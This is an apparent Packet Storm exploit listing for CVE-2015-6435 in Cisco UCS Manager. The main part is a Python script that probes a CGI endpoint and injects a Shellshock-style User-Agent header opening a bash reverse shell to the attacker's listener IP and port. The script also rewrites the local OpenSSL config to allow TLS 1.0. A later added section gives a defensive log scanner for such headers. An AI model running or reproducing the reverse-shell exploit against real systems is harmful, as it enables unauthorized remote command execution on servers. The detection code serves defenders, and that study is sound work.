Cisco UCS Manager 2.2(1d) Remote Command Execution

Posted Jan 18, 2021
Authored by liquidsky

Cisco UCS Manager version 2.2(1d) remote command execution exploit. An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.

tags | exploit, remote, web, arbitrary, shell, cgi
systems | cisco
advisories | CVE-2015-6435
SHA-256 | f3fab9befb8e7cbad15afa31a69504a465f274122e534cebcbde38a7d8f6288e

import sys, ssl, os, time
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

#
# Exploit Title : Cisco UCS Manager - 2.2(1d) - Remote Command Execution
# Description : An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.
# Date : 1/15/2021
# Exploit Author : liquidsky (J.McPeters)
# Vulnerable Software : Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).]
# Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html
# Version : 2.2(1d), 2.2(3c)A
# Cisco Reference : https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888
# Tested On : Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64))
# Author Site : https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution
# Demo : https://youtu.be/bZAcJrwPEb0
# CVE : CVE-2015-6435 | https://nvd.nist.gov/vuln/detail/CVE-2015-6435
# Special Notes : This application by default uses outdated TLS 1.0 for communication, so that's why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changed back after exploitation).
#
# Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~
#

print "+-------------------------------------------------------------+"
print
print "- Cisco Unified Computing System Manager CGI RCE "
print
print " Cisco UCS Manager - 2.2(1d) - CVE-2015-6435"
print
print "- PoC by: LiquidSky - 1/15/21 | CISCO-BUG-ID: CSCur90888 "
print
print "+-------------------------------------------------------------+"

try:
    target = sys.argv[1]
    shellip = sys.argv[2]
    shellport = sys.argv[3]

except IndexError:
    print
    print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0]
    print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0]
    print
    sys.exit()

def ch3x_w00t():
    if os.geteuid()==0:
        print "[*] Running exploit as root."
    else:
        print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf"
        print "[x] Most likely going to see an error..."
        time.sleep(5)

# Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages...
def cisco_vuln():
    ch3x_w00t()
    print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)"
    os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak")
    os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf")
    print "[*] Checking vulnerable URL "
    headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
    #Checking page
    check = requests.get(cisco_url, headers=headers1, verify=False)
    #Grabbing response
    res = check.text
    if "true" in res:
        return True
    return False

# Safety check - make sure the user is okay with the TLS1.0 temp fix
# Shout out to Dean ^^ for keeping me polite...

def exploit_question():
    print "[x] Warning the service by default uses TLS1.0 so . . ."
    print
    print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2"
    print
    print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..."
    print
    question = raw_input('[!] Do you wish to continue, "yes" or "no" ?')
    if question == 'yes':
        print
        print "[!] Great attempting exploitation checks: " + target + '!'
        cisco_vuln()
    else:
        print
        print "[x] Stay safe m8 ;) - Read the source, its safe . . "
        print
        sys.exit()

exploit_question()

def cisco_response():
    headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
    request = requests.get(cisco_url, headers=headers1, verify=False)
    if request.status_code == 200:
        print "[x] Page seems to exist -- Possibly vulnerable?"
    else:
        print "[!] Page does not exist - Not vulnerable"
        print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
        os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
        sys.exit()

def cisco_exploit():
    cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
    headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

    print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + ""
    print "[?] If this works you will see the exploit hang"

    requests.get(cisco_url, headers=headers, verify=False)
    print "[!] Shell Sent"

cisco_exploit()

def main():
    if cisco_vuln():
        print ""
        print "[+] Perhaps success?"
        print ""
        print " ^_~ got shellz? - [ liquidsky | 2021 ]"
        print
        print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
        os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
    else:
        print "[-] failure!"
        print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
        os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")

if __name__ == "__main__":
    main()
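
From the defender's side, the request this PoC sends is recognisable by the bash function-definition prefix `() {` in the User-Agent header of a request to /ucsm/isSamInstalled.cgi. The following is an added example, not part of the original exploit or the author's code: a log scanner that flags that prefix in logged header fields, assuming the UCS Manager sits behind a proxy or web server that writes Combined Log Format; the function name and sample lines are constructed for illustration.

```python
import re

# Bash function-definition prefix seen in the PoC's User-Agent header: "() {"
FUNC_DEF = re.compile(r"\(\)\s*\{")
# UCS Manager CGI endpoints under /ucsm/ (the PoC targets isSamInstalled.cgi)
UCSM_CGI = re.compile(r"^/ucsm/[^?\s]*\.cgi", re.IGNORECASE)
# Combined Log Format (assumed): host ident user [time] "request" status bytes "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

def scan(lines):
    """Return one finding per log line carrying a function definition in a header."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess at its fields
        hit = [f for f in ("ua", "referer") if FUNC_DEF.search(m.group(f))]
        if not hit:
            continue
        findings.append({
            "line": n,
            "src": m.group("src"),
            "path": m.group("path"),
            "fields": hit,
            # High when aimed at a UCSM CGI endpoint, medium for any other path
            "severity": "high" if UCSM_CGI.match(m.group("path")) else "medium",
        })
    return findings

# Constructed sample log lines (documentation address ranges, harmless commands)
SAMPLE = [
    '198.51.100.7 - - [18/Jan/2021:10:00:01 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.9 - - [18/Jan/2021:10:00:05 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" 200 0 "-" "() { ignored;};/bin/true"',
    '203.0.113.9 - - [18/Jan/2021:10:00:09 +0000] "GET /index.html HTTP/1.1" 404 0 "() { :; }; /bin/true" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A plain browser-style request to the same CGI (the first sample line) is not flagged, so the check the PoC performs before sending its payload is not distinguishable from normal traffic by this rule alone.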
© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close